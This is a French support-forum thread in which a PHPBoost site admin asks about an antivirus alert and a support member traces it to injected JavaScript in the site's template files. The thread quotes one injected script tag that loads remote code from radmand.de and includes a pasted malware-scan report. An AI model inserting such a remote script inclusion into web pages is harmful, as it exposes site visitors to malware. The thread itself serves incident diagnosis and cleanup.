Demande d'info
Global.js
Support Général
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
Certains membres du site Indre Poker m'ont rapportés un probleme que voici
AVAST
infection bloquée
URL : http://www.indrepoker.com/kernel/framework/js/global...
Infection : JS:Includer-AUF [Trj]
ce signalement n'est qu'avec Avast
pouvez vous m'en dire plus car je ne sais quoi repondre
Merci a l'avance pour vos reponses
janus57 Membre non connecté
- Booster Fusée
- Voir le profil du membre janus57
- Inscrit le : 07/12/2007
- Groupes :
- Equipe Assistance
surement un faux positif(pour être sur vérifier que vous êtes en version 3.0.11, et si oui transférer le fichier global.js depuis l'archive fraichement télécharger ici), par contre y a une inclusion JavaScript qui n'a absolument rien à voir avec PHPBoost : http://sitecheck.sucuri.net/results/indrepoker.com
P.S. Avast est légèrement "merdique", en free edition Avira est mieux, et en payant 4 se démarque (G-Data, BiteDefender, Kaspersky, F-Secure)
Cordialement, janus57
Édité par janus57 Le 25/02/2014 à 17h57
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
Code TEXT :
ISSUE DETECTED DEFINITION INFECTED URL Website Malware malware-entry-mwjsanon7 http://www.indrepoker.com/templates/IndrePoker/tableau/tabcontent.js ( View Payload ) Website Malware malware-entry-mwjsanon7 http://www.indrepoker.com/news/news.php ( View Payload ) Website Malware malware-entry-mwjsanon7 http://www.indrepoker.com/news/404testpage4525d2fdc ( View Payload ) Website Malware malware-entry-mwjsanon7 http://www.indrepoker.com/news/404javascript.js ( View Payload ) Website Malware malware-entry-mwjsanon7 http://www.indrepoker.com ( View Payload ) Website Malware malware-entry-mwjsanon7 http://www.indrepoker.com/news/news.php?cat=1 ( View Payload )
sur le ftp par exemple il y a pas de dossier tableau dans templates/indrepoker/
franchement j'y comprends rien
dans le global.js il a bien un script
http://radmand.de
je l'ai viré et remis le global par contre je trouve pas le reste ce qui m'inquiete est de savoir comment c'est venu cette merde
Édité par PascalD36 Le 25/02/2014 à 18h31
janus57 Membre non connecté
- Booster Fusée
- Voir le profil du membre janus57
- Inscrit le : 07/12/2007
- Groupes :
- Equipe Assistance
vous utiliser bien la dernière version (3.0.11) ?
Tous les admins ont-il fait un scann de leur PC à la recherche de logiciel indésirables ?
Citation :
dans le global.js il a bien un script
oui c'est un JavaScript de PHPBoost
Par contre vous avez une inclusion global venant de radmand[dot]de, et cette inclusion global ne peu pas venir du global.js vu que l'insclusion se fait avant les balises HTML, donc il y a eu une injection dans un voir plusieurs de vos fichiers.
Preuve : voici encore une autre inclusion :
Citation :
<!--5f58e8--><script type="text/javascript" src="http://radmand.de/esd.php?id=24215025"></script><!--/5f58e8-->
Donc soit le site à très mal été nettoyer depuis la dernière fois (ce qui semble être le cas, vu que le script malveillant tombe en 404), soit la personne qui l'avait infectés est revenu.
Cordialement, janus57
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
depuis la derniere fois ou on a eu un prob d'injection
on a remis une intalle neuve par contre on a remis la base sql c'est le seul point commun
janus57 Membre non connecté
- Booster Fusée
- Voir le profil du membre janus57
- Inscrit le : 07/12/2007
- Groupes :
- Equipe Assistance
PascalD36 :
on est bien en 3.11
depuis la derniere fois ou on a eu un prob d'injection
on a remis une intalle neuve par contre on a remis la base sql c'est le seul point commun
depuis la derniere fois ou on a eu un prob d'injection
on a remis une intalle neuve par contre on a remis la base sql c'est le seul point commun
Bonsoir,
vu les différentes injections et leur position, cela ne viens pas de la BDD, mais cela viens de votre thème, donc installation neuve ou pas, si vous remettez votre thème qui est infectés de partout cela reviens au même.
Car si cette injection était dans la BDD elle ne se trouverais pas hors balises HTML, en plein milieu du module "en ligne" ainsi qu'en plein miliieu de vos news (oui oui il y a 3 injections de code JavaScript).
Pour le coup je ne peu que vous conseiller de vérifier votre template fichier par fichier à la recherche de code malicieux et ne provenant pas de vous.
De plus en tant que parano je limiterais l'accès FTP au maximum à 3personnes en plus de les obliger à faire un scann avec une version de démo d'un bon anti-virus (g-data ou kaspersky) pour être sur que leur PC ne soit pas infectés.
Enfin dès que tout ceci est fait de changerais le mot de passe du FTP
Edit: je viens déjà de repérer une injection dans header.tpl + une autre dans footer.tpl
Cordialement, janus57
Édité par janus57 Le 25/02/2014 à 19h26
PascalD36 Membre non connecté
Booster Bazooka
- Booster Bazooka
- Voir le profil du membre PascalD36
- Inscrit le : 12/05/2009
- Site internet
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie